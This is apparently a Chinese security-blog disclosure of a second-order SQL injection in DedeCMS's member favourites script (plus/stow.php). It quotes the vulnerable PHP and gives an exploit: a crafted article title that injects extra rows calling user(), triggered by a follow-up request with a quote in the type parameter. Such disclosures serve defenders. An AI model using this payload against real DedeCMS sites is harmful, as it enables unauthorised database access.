Dedecms 会员中心注入漏洞8(二次注入)

  • A+
所属分类:漏洞时代
摘要

[php][/php]那么soeasy 我们发布一个文章http://127.0.0.1/dede/member/content_list.php?channelid=1 打开这里发布


漏洞作者: Matt

[php]

/plus/stow.php if($type=='') {     $row = $dsql->GetOne("SELECT * FROM `#@__member_stow` WHERE aid='$aid'   AND mid='{$ml->M_ID}'");     if(!is_array($row))     {         $dsql->ExecuteNoneQuery("INSERT INTO `#@__member_stow`  (mid,aid,title,addtime) VALUES ('".$ml->M_ID."','$aid','".addslashes  ($arctitle)."','$addtime'); ");     } else {   ShowMsg('您已经成功收藏该内容,无需重复收  藏!','javascript:window.close();');   exit();  } } else {     $row = $dsql->GetOne("SELECT * FROM `#@__member_stow` WHERE   type='$type' AND (aid='$aid' AND mid='{$ml->M_ID}')");     if(!is_array($row))     {         $dsql->ExecuteNoneQuery(" INSERT INTO `#@__member_stow`  (mid,aid,title,addtime,type) VALUES ('".$ml-  >M_ID."','$aid','$title','$addtime','$type'); ");//这里的TITLE是从数据库里  查询出来的,也就是我们发布的文章的标题     }

[/php]

漏洞证明:

那么soeasy 我们发布一个文章

http://127.0.0.1/dede/member/content_list.php?channelid=1 打开这里发布

文章标题写上 1111',1,2),(8,136,user(),1,2),(1,2,'3

其他随意

然后提交

完了之后查看一下文章的ID

在打开http://127.0.0.1/dede/plus/stow.php?aid=137&type=11%27

把137改成你的文章ID就哦了

Dedecms 会员中心注入漏洞8(二次注入)

Dedecms 会员中心注入漏洞8(二次注入)

Dedecms 会员中心注入漏洞8(二次注入)

Dedecms 会员中心注入漏洞8(二次注入)

 

 

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: